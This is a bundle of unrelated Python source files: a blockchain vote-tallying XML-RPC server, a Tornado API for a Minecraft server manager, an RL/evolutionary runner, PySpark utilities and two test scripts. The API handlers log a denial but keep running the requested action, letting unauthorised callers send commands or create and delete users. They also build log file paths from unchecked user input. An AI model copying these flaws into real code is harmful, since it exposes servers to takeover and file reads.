self.register_instance(HomologatorService(self))
def _create_logger(self):
self.logger = logger_factory('Homologator',
'Homologator.log')
self.logger.info('Ready')
class HomologatorService:
def __init__(self, homologator: Homologator):
self.homologator = homologator
self.port = self.homologator.addr[1]
self.logger = logging.getLogger('Homologator')
self.candidates = []
self.candidate_number = dict()
self.candidate_parties = dict()
self._get_candidates()
self.blockchain_candidates = []
self.number_candidates = len(self.candidate_number)
for i in range(self.number_candidates):
bc = Blockchain(i)
self.blockchain_candidates.append(bc)
def shutdown(self):
self.logger.info('Setting shutdown event')
self.homologator.shutdown_event.set()
with self.homologator.shutdown_condition:
self.homologator.shutdown_condition.notify()
def homologate_vote(self, vote: Vote):
self.logger.info('Received vote to homologate')
self.add_vote(vote)
return 'Vote homologated'
def add_vote(self, vote):
candidate_position = self.candidate_number[vote['candidate']]
transaction = Transaction(vote['name'], vote['cpf'])
self.blockchain_candidates[candidate_position].add_pending(transaction)
self.blockchain_candidates[candidate_position].build_block()
def show_all_blockchains(self):
for blockchain_candidate in self.blockchain_candidates:
for block in blockchain_candidate.blockchain:
print(block)
print(len(blockchain_candidate.blockchain))
def get_election_winner(self):
self.logger.info('Received request to send the winner of the election')
max_chain_length = 0
name_candidate = ''
for blockchain_candidate in self.blockchain_candidates:
if (max_chain_length < len(blockchain_candidate.blockchain) - 1) and blockchain_candidate.is_valid():
max_chain_length = len(blockchain_candidate.blockchain) - 1
name_candidate = self.candidates[blockchain_candidate.id][0]
return name_candidate
def pass_blockchains_to_new_homologator(self, candidate: int):
self.logger.info(f'Passing the candidate {candidate} transactions to a new homologator')
return [block.transactions for block in self.blockchain_candidates[candidate].blockchain]
def pass_ports(self, ports: list):
self.logger.info('Received homologators ports')
old_homologators = []
for port in ports:
old_homologator = xmlrpc.client.ServerProxy(f'http://localhost:{port}')
old_homologators.append(old_homologator)
for candidate in range(self.number_candidates):
self.logger.info(f'Fetching transactions for candidate {candidate}')
blockchain_candidate = []
for old_homologator in old_homologators:
self.logger.info(f'Fetching from homologator {old_homologator}')
list_transaction = old_homologator.pass_blockchains_to_new_homologator(candidate)
self.logger.info('Constructing blockchain')
bc = Blockchain(candidate)
bc.copy_blocks(list_transaction)
self.logger.info('Blockchain constructed successfully')
blockchain_candidate.append(bc)
self.logger.info('Validating blockchains')
blockchain_candidate = [bc for bc in blockchain_candidate if bc.is_valid()]
biggest_size = max([len(bc.blockchain) for bc in blockchain_candidate])
blockchain_candidate = [bc for bc in blockchain_candidate if len(bc.blockchain) == biggest_size]
self.blockchain_candidates[candidate] = blockchain_candidate[0]
self.logger.info('Blockchains created')
def _get_candidates(self):
file = open('candidates.csv', 'r')
for idx, line in enumerate(file.readlines()[1:]):
candidate, party = line.split(',')
self.candidates.append((candidate, party))
self.candidate_number[candidate] = idx
self.candidate_parties[candidate] = party
if __name__ == "__main__":
port = int(sys.argv[1])
homologator = Homologator(addr=('localhost', port))
homologator.start()
election_coordinator = xmlrpc.client.ServerProxy(RPC_SERVER_URI)
try:
election_coordinator.add_homologator(port)
except xmlrpc.client.ProtocolError as err:
print("Error occurred")
|
api.py
|
import os
import secrets
import threading
import tornado.web
import tornado.escape
import logging.config
from app.classes.models import Roles, Users, check_role_permission, Remote, model_to_dict
from app.classes.multiserv import multi
from app.classes.helpers import helper
from app.classes.backupmgr import backupmgr
logger = logging.getLogger(__name__)
class BaseHandler(tornado.web.RequestHandler):
def check_xsrf_cookie(self):
# Disable CSRF protection on API routes
pass
def return_response(self, status, errors, data, messages):
# Define a standardized response
self.write({
"status": status,
"data": data,
"errors": errors,
"messages": messages
})
def access_denied(self, user):
logger.info("User %s was denied access to API route", user)
self.set_status(403)
self.finish(self.return_response(403, {'error':'ACCESS_DENIED'}, {}, {'info':'You were denied access to the requested resource'}))
def authenticate_user(self, token):
try:
logger.debug("Searching for specified token")
user_data = Users.get(api_token=token)
logger.debug("Checking results")
if user_data:
# Login successful! Return the username
logger.info("User {} has authenticated to API".format(user_data.username))
return user_data.username
else:
logging.debug("Auth unsuccessful")
return None
except:
logger.warning("Traceback occurred when authenticating user to API. Most likely wrong token")
return None
pass
class SendCommand(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'svr_control'):
self.access_denied(user)
command = self.get_body_argument('command', default=None, strip=True)
server_id = self.get_argument('id')
if command:
server = multi.get_server_obj(server_id)
if server.check_running:
server.send_command(command)
self.return_response(200, '', {"run": True}, '')
else:
self.return_response(200, {'error':'SER_NOT_RUNNING'}, {}, {})
else:
self.return_response(200, {'error':'NO_COMMAND'}, {}, {})
class GetHostStats(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def get(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
stats = multi.get_host_status()
stats.pop('time') # We dont need the request time
self.return_response(200, {}, stats, {})
class GetServerStats(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def get(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
stats = multi.get_stats_for_servers()
data = []
for server in stats:
server = stats[server]
server.pop('time') # We dont need the request time
data.append(server)
self.return_response(200, {}, data, {})
class SearchMCLogs(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
search_string = self.get_argument('query', default=None, strip=True)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
logfile = os.path.join(server.server_path, 'logs', 'latest.log')
data = helper.search_file(logfile, search_string)
line_list = []
if data:
for line in data:
line_list.append({'line_num': line[0], 'message': line[1]})
self.return_response(200, {}, line_list, {})
class GetMCLogs(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def get(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
logfile = os.path.join(server.server_path, 'logs', 'latest.log')
data = helper.search_file(logfile, '')
line_list = []
if data:
for line in data:
line_list.append({'line_num': line[0], 'message': line[1]})
self.return_response(200, {}, line_list, {})
class GetCraftyLogs(BaseHandler):
def get(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
filename = self.get_argument('name')
logfile = os.path.join('logs', filename + '.log')
data = helper.search_file(logfile, '')
line_list = []
if data:
for line in data:
line_list.append({'line_num': line[0], 'message': line[1]})
self.return_response(200, {}, line_list, {})
class SearchCraftyLogs(BaseHandler):
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
filename = self.get_argument('name')
query = self.get_argument('query')
logfile = os.path.join('logs', filename + '.log')
data = helper.search_file(logfile, query)
line_list = []
if data:
for line in data:
line_list.append({'line_num': line[0], 'message': line[1]})
self.return_response(200, {}, line_list, {})
class ForceServerBackup(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'backups'):
self.access_denied(user)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
backup_thread = threading.Thread(name='backup', target=server.backup_server, daemon=False)
backup_thread.start()
self.return_response(200, {}, {'code':'SER_BAK_CALLED'}, {})
class StartServer(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'svr_control'):
self.access_denied(user)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
if not server.check_running():
Remote.insert({
Remote.command: 'start_mc_server',
Remote.server_id: server_id,
Remote.command_source: "localhost"
}).execute()
self.return_response(200, {}, {'code':'SER_START_CALLED'}, {})
else:
self.return_response(500, {'error':'SER_RUNNING'}, {}, {})
class StopServer(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'svr_control'):
self.access_denied(user)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
if server.check_running():
Remote.insert({
Remote.command: 'stop_mc_server',
Remote.server_id: server_id,
Remote.command_source: "localhost"
}).execute()
self.return_response(200, {}, {'code':'SER_STOP_CALLED'}, {})
else:
self.return_response(500, {'error':'SER_NOT_RUNNING'}, {}, {})
class RestartServer(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'svr_control'):
self.access_denied(user)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
server.restart_threaded_server()
self.return_response(200, {}, {'code':'SER_RESTART_CALLED'}, {})
class CreateUser(BaseHandler):
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'config'):
self.access_denied(user)
new_username = self.get_argument("username")
# TODO: implement role checking
#new_role = self.get_argument("role", 'Mod')
if new_username:
new_pass = helper.random_string_generator()
new_token = secrets.token_urlsafe(32)
result = Users.insert({
Users.username: new_username,
Users.role: 'Mod',
Users.password: helper.encode_pass(new_pass),
Users.api_token: new_token
}).execute()
self.return_response(200, {}, {'code':'COMPLETE', 'username': new_username, 'password': new_pass, 'api_token': new_token}, {})
else:
self.return_response(500, {'error':'MISSING_PARAMS'}, {}, {'info':'Some paramaters failed validation'})
class DeleteUser(BaseHandler):
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'config'):
self.access_denied(user)
username = self.get_argument("username", None, True)
if username == 'Admin':
self.return_response(500, {'error':'NOT_ALLOWED'}, {}, {'info':'You cannot delete the admin user'})
else:
if username:
Users.delete().where(Users.username == username).execute()
self.return_response(200, {}, {'code':'COMPLETED'}, {})
class ListServers(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def get(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access'):
self.access_denied(user)
self.return_response(200, {}, {"code": "COMPLETED", "servers": multi.list_servers()}, {})
|
multiproc.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 26 09:33:45 2020
@author: majdi
"""
import os, random
#import tensorflow as tf
#tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
# import input parameters from the user
from neorl.parsers.PARSER import InputChecker
from neorl.rl.runners.dqn import DQNAgent
from neorl.rl.runners.ppo2 import PPOAgent
from neorl.rl.runners.a2c import A2CAgent
from neorl.rl.runners.acer import ACERAgent
from multiprocessing import Process
from neorl.evolu.runners.ga import GAAgent
from neorl.evolu.runners.sa import SAAgent
from neorl.utils.neorlcalls import SavePlotCallback
from neorl.rl.baselines.shared.callbacks import BaseCallback
class MultiProc (InputChecker):
def __init__ (self, inp):
self.inp=inp
os.environ["KMP_WARNINGS"] = "FALSE"
#os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
def dqn_proc(self):
dqn_callback=SavePlotCallback(check_freq=self.inp.dqn_dict["check_freq"][0], avg_step=self.inp.dqn_dict["avg_episodes"][0],
log_dir=self.inp.gen_dict["log_dir"]+self.inp.dqn_dict["casename"][0], plot_mode=self.inp.gen_dict["plot_mode"][0],
total_timesteps=self.inp.dqn_dict["time_steps"][0], basecall=BaseCallback())
dqn=DQNAgent(self.inp, dqn_callback)
dqn.build()
return
def ppo_proc(self):
ppo_callback=SavePlotCallback(check_freq=self.inp.ppo_dict["check_freq"][0], avg_step=self.inp.ppo_dict["avg_episodes"][0],
log_dir=self.inp.gen_dict["log_dir"]+self.inp.ppo_dict["casename"][0], plot_mode=self.inp.gen_dict["plot_mode"][0],
total_timesteps=self.inp.ppo_dict["time_steps"][0], basecall=BaseCallback())
ppo=PPOAgent(self.inp, ppo_callback)
ppo.build()
return
def a2c_proc(self):
a2c_callback=SavePlotCallback(check_freq=self.inp.a2c_dict["check_freq"][0], avg_step=self.inp.a2c_dict["avg_episodes"][0],
log_dir=self.inp.gen_dict["log_dir"]+self.inp.a2c_dict["casename"][0], plot_mode=self.inp.gen_dict["plot_mode"][0],
total_timesteps=self.inp.a2c_dict["time_steps"][0], basecall=BaseCallback())
a2c=A2CAgent(self.inp, a2c_callback)
a2c.build()
return
def acer_proc(self):
acer_callback=SavePlotCallback(check_freq=self.inp.acer_dict["check_freq"][0], avg_step=self.inp.acer_dict["avg_episodes"][0],
log_dir=self.inp.gen_dict["log_dir"]+self.inp.acer_dict["casename"][0], plot_mode=self.inp.gen_dict["plot_mode"][0],
total_timesteps=self.inp.acer_dict["time_steps"][0], basecall=BaseCallback())
acer=ACERAgent(self.inp, acer_callback)
acer.build()
return
def ga_proc(self):
#check_freq is set by default to every generation for GA, so it does not have any effect in the callback
#total_timesteps is set by default to all generations for GA, so it does not have any effect in the callback
ga_callback=SavePlotCallback(check_freq=self.inp.ga_dict["check_freq"][0], avg_step=self.inp.ga_dict["pop"][0],
log_dir=self.inp.gen_dict["log_dir"]+self.inp.ga_dict["casename"][0], plot_mode=self.inp.gen_dict["plot_mode"][0],
total_timesteps=self.inp.ga_dict["ngen"][0], basecall=BaseCallback())
ga=GAAgent(self.inp, ga_callback)
ga.build()
return
def sa_proc(self):
#avg_step is set by default to every check_freq, so it does not have any effect in the callback
#total_timesteps is set by default to all generations for SA, so it does not have any effect in the callback
sa_callback=SavePlotCallback(check_freq=self.inp.sa_dict["check_freq"][0], avg_step=self.inp.sa_dict["avg_step"][0],
log_dir=self.inp.gen_dict["log_dir"]+self.inp.sa_dict["casename"][0], plot_mode=self.inp.gen_dict["plot_mode"][0],
total_timesteps=self.inp.sa_dict["steps"][0], basecall=BaseCallback())
sa=SAAgent(self.inp, sa_callback)
sa.build()
return
def run_all(self):
# setup all processes
if self.inp.dqn_dict['flag'][0]:
dqn_task = Process(name='dqn', target=self.dqn_proc)
if self.inp.ppo_dict['flag'][0]:
ppo_task = Process(name='ppo', target=self.ppo_proc)
if self.inp.a2c_dict['flag'][0]:
a2c_task = Process(name='a2c', target=self.a2c_proc)
if self.inp.acer_dict['flag'][0]:
acer_task = Process(name='acer', target=self.acer_proc)
if self.inp.ga_dict['flag'][0]:
ga_task = Process(name='ga', target=self.ga_proc)
if self.inp.sa_dict['flag'][0]:
sa_task = Process(name='sa', target=self.sa_proc)
# start running processes
if self.inp.dqn_dict['flag'][0]:
dqn_task.start()
print('--- DQN is running on {cores} core(s)'.format(cores=self.inp.dqn_dict["ncores"][0]))
if self.inp.ppo_dict['flag'][0]:
ppo_task.start()
print('--- PPO is running on {cores} core(s)'.format(cores=self.inp.ppo_dict["ncores"][0]))
if self.inp.a2c_dict['flag'][0]:
a2c_task.start()
print('--- A2C is running on {cores} core(s)'.format(cores=self.inp.a2c_dict["ncores"][0]))
if self.inp.acer_dict['flag'][0]:
acer_task.start()
print('--- ACER is running on {cores} core(s)'.format(cores=self.inp.acer_dict["ncores"][0]))
if self.inp.ga_dict['flag'][0]:
ga_task.start()
print('--- GA is running on {cores} core(s)'.format(cores=self.inp.ga_dict["ncores"][0]))
if self.inp.sa_dict['flag'][0]:
sa_task.start()
print('--- SA is running on {cores} core(s)'.format(cores=self.inp.sa_dict["ncores"][0]))
print('------------------------------------------------------------------------------')
|
util.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import functools
import itertools
import os
import platform
import re
import sys
import threading
import traceback
from types import TracebackType
from typing import Any, Callable, Iterator, List, Optional, TextIO, Tuple
from py4j.clientserver import ClientServer # type: ignore[import]
__all__: List[str] = []
from py4j.java_gateway import JavaObject
def print_exec(stream: TextIO) -> None:
ei = sys.exc_info()
traceback.print_exception(ei[0], ei[1], ei[2], None, stream)
class VersionUtils:
"""
Provides utility method to determine Spark versions with given input string.
"""
@staticmethod
def majorMinorVersion(sparkVersion: str) -> Tuple[int, int]:
"""
Given a Spark version string, return the (major version number, minor version number).
E.g., for 2.0.1-SNAPSHOT, return (2, 0).
Examples
--------
>>> sparkVersion = "2.4.0"
>>> VersionUtils.majorMinorVersion(sparkVersion)
(2, 4)
>>> sparkVersion = "2.3.0-SNAPSHOT"
>>> VersionUtils.majorMinorVersion(sparkVersion)
(2, 3)
"""
m = re.search(r"^(\d+)\.(\d+)(\..*)?$", sparkVersion)
if m is not None:
return (int(m.group(1)), int(m.group(2)))
else:
raise ValueError(
"Spark tried to parse '%s' as a Spark" % sparkVersion
+ " version string, but it could not find the major and minor"
+ " version numbers."
)
def fail_on_stopiteration(f: Callable) -> Callable:
"""
Wraps the input function to fail on 'StopIteration' by raising a 'RuntimeError'
prevents silent loss of data when 'f' is used in a for loop in Spark code
"""
def wrapper(*args: Any, **kwargs: Any) -> Any:
try:
return f(*args, **kwargs)
except StopIteration as exc:
raise RuntimeError(
"Caught StopIteration thrown from user's code; failing the task", exc
)
return wrapper
def walk_tb(tb: Optional[TracebackType]) -> Iterator[TracebackType]:
while tb is not None:
yield tb
tb = tb.tb_next
def try_simplify_traceback(tb: TracebackType) -> Optional[TracebackType]:
"""
Simplify the traceback. It removes the tracebacks in the current package, and only
shows the traceback that is related to the thirdparty and user-specified codes.
Returns
-------
TracebackType or None
Simplified traceback instance. It returns None if it fails to simplify.
Notes
-----
This keeps the tracebacks once it sees they are from a different file even
though the following tracebacks are from the current package.
Examples
--------
>>> import importlib
>>> import sys
>>> import traceback
>>> import tempfile
>>> with tempfile.TemporaryDirectory() as tmp_dir:
... with open("%s/dummy_module.py" % tmp_dir, "w") as f:
... _ = f.write(
... 'def raise_stop_iteration():\\n'
... ' raise StopIteration()\\n\\n'
... 'def simple_wrapper(f):\\n'
... ' def wrapper(*a, **k):\\n'
... ' return f(*a, **k)\\n'
... ' return wrapper\\n')
... f.flush()
... spec = importlib.util.spec_from_file_location(
... "dummy_module", "%s/dummy_module.py" % tmp_dir)
... dummy_module = importlib.util.module_from_spec(spec)
... spec.loader.exec_module(dummy_module)
>>> def skip_doctest_traceback(tb):
... import pyspark
... root = os.path.dirname(pyspark.__file__)
... pairs = zip(walk_tb(tb), traceback.extract_tb(tb))
... for cur_tb, cur_frame in pairs:
... if cur_frame.filename.startswith(root):
... return cur_tb
Regular exceptions should show the file name of the current package as below.
>>> exc_info = None
>>> try:
... fail_on_stopiteration(dummy_module.raise_stop_iteration)()
... except Exception as e:
... tb = sys.exc_info()[-1]
... e.__cause__ = None
... exc_info = "".join(
... traceback.format_exception(type(e), e, tb))
>>> print(exc_info) # doctest: +NORMALIZE_WHITESPACE, +ELLIPSIS
Traceback (most recent call last):
File ...
...
File "/.../pyspark/util.py", line ...
...
RuntimeError: ...
>>> "pyspark/util.py" in exc_info
True
If the traceback is simplified with this method, it hides the current package file name:
>>> exc_info = None
>>> try:
... fail_on_stopiteration(dummy_module.raise_stop_iteration)()
... except Exception as e:
... tb = try_simplify_traceback(sys.exc_info()[-1])
... e.__cause__ = None
... exc_info = "".join(
... traceback.format_exception(
... type(e), e, try_simplify_traceback(skip_doctest_traceback(tb))))
>>> print(exc_info) # doctest: +NORMALIZE_WHITESPACE, +ELLIPSIS
RuntimeError: ...
>>> "pyspark/util.py" in exc_info
False
In the case below, the traceback contains the current package in the middle.
In this case, it just hides the top occurrence only.
>>> exc_info = None
>>> try:
... fail_on_stopiteration(dummy_module.simple_wrapper(
... fail_on_stopiteration(dummy_module.raise_stop_iteration)))()
... except Exception as e:
... tb = sys.exc_info()[-1]
... e.__cause__ = None
... exc_info_a = "".join(
... traceback.format_exception(type(e), e, tb))
... exc_info_b = "".join(
... traceback.format_exception(
... type(e), e, try_simplify_traceback(skip_doctest_traceback(tb))))
>>> exc_info_a.count("pyspark/util.py")
2
>>> exc_info_b.count("pyspark/util.py")
1
"""
if "pypy" in platform.python_implementation().lower():
# Traceback modification is not supported with PyPy in PySpark.
return None
if sys.version_info[:2] < (3, 7):
# Traceback creation is not supported Python < 3.7.
# See https://bugs.python.org/issue30579.
return None
import pyspark
root = os.path.dirname(pyspark.__file__)
tb_next = None
new_tb = None
pairs = zip(walk_tb(tb), traceback.extract_tb(tb))
last_seen = []
for cur_tb, cur_frame in pairs:
if not cur_frame.filename.startswith(root):
# Filter the stacktrace from the PySpark source itself.
last_seen = [(cur_tb, cur_frame)]
break
for cur_tb, cur_frame in reversed(list(itertools.chain(last_seen, pairs))):
# Once we have seen the file names outside, don't skip.
new_tb = TracebackType(
tb_next=tb_next,
tb_frame=cur_tb.tb_frame,
tb_lasti=cur_tb.tb_frame.f_lasti,
tb_lineno=cur_tb.tb_frame.f_lineno if cur_tb.tb_frame.f_lineno is not None else -1,
)
tb_next = new_tb
return new_tb
def _print_missing_jar(lib_name: str, pkg_name: str, jar_name: str, spark_version: str) -> None:
print(
"""
________________________________________________________________________________________________
Spark %(lib_name)s libraries not found in class path. Try one of the following.
1. Include the %(lib_name)s library and its dependencies with in the
spark-submit command as
$ bin/spark-submit --packages org.apache.spark:spark-%(pkg_name)s:%(spark_version)s ...
2. Download the JAR of the artifact from Maven Central http://search.maven.org/,
Group Id = org.apache.spark, Artifact Id = spark-%(jar_name)s, Version = %(spark_version)s.
Then, include the jar in the spark-submit command as
$ bin/spark-submit --jars <spark-%(jar_name)s.jar> ...
________________________________________________________________________________________________
"""
% {
"lib_name": lib_name,
"pkg_name": pkg_name,
"jar_name": jar_name,
"spark_version": spark_version,
}
)
def _parse_memory(s: str) -> int:
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MiB
Examples
--------
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {"g": 1024, "m": 1, "t": 1 << 20, "k": 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def inheritable_thread_target(f: Callable) -> Callable:
"""
Return thread target wrapper which is recommended to be used in PySpark when the
pinned thread mode is enabled. The wrapper function, before calling original
thread target, it inherits the inheritable properties specific
to JVM thread such as ``InheritableThreadLocal``.
Also, note that pinned thread mode does not close the connection from Python
to JVM when the thread is finished in the Python side. With this wrapper, Python
garbage-collects the Python thread instance and also closes the connection
which finishes JVM thread correctly.
When the pinned thread mode is off, it return the original ``f``.
.. versionadded:: 3.2.0
Parameters
----------
f : function
the original thread target.
Notes
-----
This API is experimental.
It is important to know that it captures the local properties when you decorate it
whereas :class:`InheritableThread` captures when the thread is started.
Therefore, it is encouraged to decorate it when you want to capture the local
properties.
For example, the local properties from the current Spark context is captured
when you define a function here instead of the invocation:
>>> @inheritable_thread_target
... def target_func():
... pass # your codes.
If you have any updates on local properties afterwards, it would not be reflected to
the Spark context in ``target_func()``.
The example below mimics the behavior of JVM threads as close as possible:
>>> Thread(target=inheritable_thread_target(target_func)).start() # doctest: +SKIP
"""
from pyspark import SparkContext
if isinstance(SparkContext._gateway, ClientServer):
# Here's when the pinned-thread mode (PYSPARK_PIN_THREAD) is on.
# NOTICE the internal difference vs `InheritableThread`. `InheritableThread`
# copies local properties when the thread starts but `inheritable_thread_target`
# copies when the function is wrapped.
assert SparkContext._active_spark_context is not None
properties = SparkContext._active_spark_context._jsc.sc().getLocalProperties().clone()
@functools.wraps(f)
def wrapped(*args: Any, **kwargs: Any) -> Any:
try:
# Set local properties in child thread.
assert SparkContext._active_spark_context is not None
SparkContext._active_spark_context._jsc.sc().setLocalProperties(properties)
return f(*args, **kwargs)
finally:
InheritableThread._clean_py4j_conn_for_current_thread()
return wrapped
else:
return f
class InheritableThread(threading.Thread):
"""
Thread that is recommended to be used in PySpark instead of :class:`threading.Thread`
when the pinned thread mode is enabled. The usage of this class is exactly same as
:class:`threading.Thread` but correctly inherits the inheritable properties specific
to JVM thread such as ``InheritableThreadLocal``.
Also, note that pinned thread mode does not close the connection from Python
to JVM when the thread is finished in the Python side. With this class, Python
garbage-collects the Python thread instance and also closes the connection
which finishes JVM thread correctly.
When the pinned thread mode is off, this works as :class:`threading.Thread`.
.. versionadded:: 3.1.0
Notes
-----
This API is experimental.
"""
_props: JavaObject
def __init__(self, target: Callable, *args: Any, **kwargs: Any):
from pyspark import SparkContext
if isinstance(SparkContext._gateway, ClientServer):
# Here's when the pinned-thread mode (PYSPARK_PIN_THREAD) is on.
def copy_local_properties(*a: Any, **k: Any) -> Any:
# self._props is set before starting the thread to match the behavior with JVM.
assert hasattr(self, "_props")
assert SparkContext._active_spark_context is not None
SparkContext._active_spark_context._jsc.sc().setLocalProperties(self._props)
try:
return target(*a, **k)
finally:
InheritableThread._clean_py4j_conn_for_current_thread()
super(InheritableThread, self).__init__(
target=copy_local_properties, *args, **kwargs # type: ignore[misc]
)
else:
super(InheritableThread, self).__init__(
target=target, *args, **kwargs # type: ignore[misc]
)
def start(self) -> None:
from pyspark import SparkContext
if isinstance(SparkContext._gateway, ClientServer):
# Here's when the pinned-thread mode (PYSPARK_PIN_THREAD) is on.
# Local property copy should happen in Thread.start to mimic JVM's behavior.
assert SparkContext._active_spark_context is not None
self._props = SparkContext._active_spark_context._jsc.sc().getLocalProperties().clone()
return super(InheritableThread, self).start()
@staticmethod
def _clean_py4j_conn_for_current_thread() -> None:
from pyspark import SparkContext
jvm = SparkContext._jvm
assert jvm is not None
thread_connection = jvm._gateway_client.get_thread_connection()
if thread_connection is not None:
try:
# Dequeue is shared across other threads but it's thread-safe.
# If this function has to be invoked one more time in the same thead
# Py4J will create a new connection automatically.
jvm._gateway_client.deque.remove(thread_connection)
except ValueError:
# Should never reach this point
return
finally:
thread_connection.close()
if __name__ == "__main__":
if "pypy" not in platform.python_implementation().lower() and sys.version_info[:2] >= (3, 7):
import doctest
import pyspark.util
from pyspark.context import SparkContext
globs = pyspark.util.__dict__.copy()
globs["sc"] = SparkContext("local[4]", "PythonTest")
(failure_count, test_count) = doctest.testmod(pyspark.util, globs=globs)
globs["sc"].stop()
if failure_count:
sys.exit(-1)
|
test_threads.py
|
import pytest
from threading import Thread
from godot import Vector3, SurfaceTool, Mesh, MeshInstance
def test_simple_thread():
thread_said_hello = False
def target():
nonlocal thread_said_hello
thread_said_hello = True
t = Thread(target=target, daemon=True)
t.start()
t.join(timeout=1)
assert thread_said_hello
def test_use_godot_from_thread():
def target():
st = SurfaceTool()
st.begin(Mesh.PRIMITIVE_TRIANGLES)
st.add_vertex(Vector3(-1, -1, 0))
st.add_vertex(Vector3(-1, 1, 0))
st.add_vertex(Vector3(1, 1, 0))
mesh = st.commit()
mi = MeshInstance.new()
mi.mesh = mesh
mi.free()
t = Thread(target=target, daemon=True)
t.start()
t.join(timeout=1)
|
test_cleaner.py
|
from cleaner import cleaner
from fetcher import fetcher
from parse_config import parse_config
from loader import load_database
from manager import CANNOT_SPAWN, OPS_KILLED, NO_OUTPUT, ExecutorResult
from utils import make_pool
from db_txn import db_execute, db_insert, db_result, db_txn
from functools import partial
from os import _exit
from threading import Condition, Event, Lock, Thread
from uuid import uuid4
import logging, logging.config
def do_setup(acc, user):
print acc, user
uid = str(uuid4())
yield db_execute('''INSERT INTO task(task_identification, status,
site_asset_id, company_id,
task_priority, user_id, clip_duration,
clip_format)
VALUES (%s, 'query', UUID(), %s, 128, %s, 600,
'mp4')''', uid, acc, user)
_, r = yield db_insert('''INSERT INTO taskQueryHis(task_identification)
VALUES (%s)''', uid)
yield db_result(uid, r)
def setup(config, pool, acc, user):
total = 20
rows = {}
for _ in xrange(total):
uid, r = db_txn(pool, partial(do_setup, acc, user))
print uid, r
rows[uid] = r
fetch = fetcher(config, pool, Condition(Lock()), Condition(Lock()))
clean = cleaner(config, pool, Condition(Lock()), Condition(Lock()))
ev = Event()
ev.clear()
load = Thread(target=load_database, args=(config, pool, ev, [fetch, clean])) # @IgnorePep8
load.start()
ev.wait()
fetch.start()
tasks = []
while len(tasks) < total:
print 'already fetched: ', len(tasks), 'tasks'
print 'to fetch tasks from db'
fetch.request(acc)
for r in fetch.replies(True):
ts = r[1]
print 'fetched', len(ts), 'tasks'
for t in ts:
if t.uuid in rows:
tasks.append((t, rows[t.uuid]))
return (clean, tasks)
logging.config.fileConfig('test_log.conf')
config = parse_config('test.conf')
pool = make_pool(config)
account = int(config['test_account'])
user = int(config['test_user'])
clean, tasks = setup(config, pool, account, user)
clean.start()
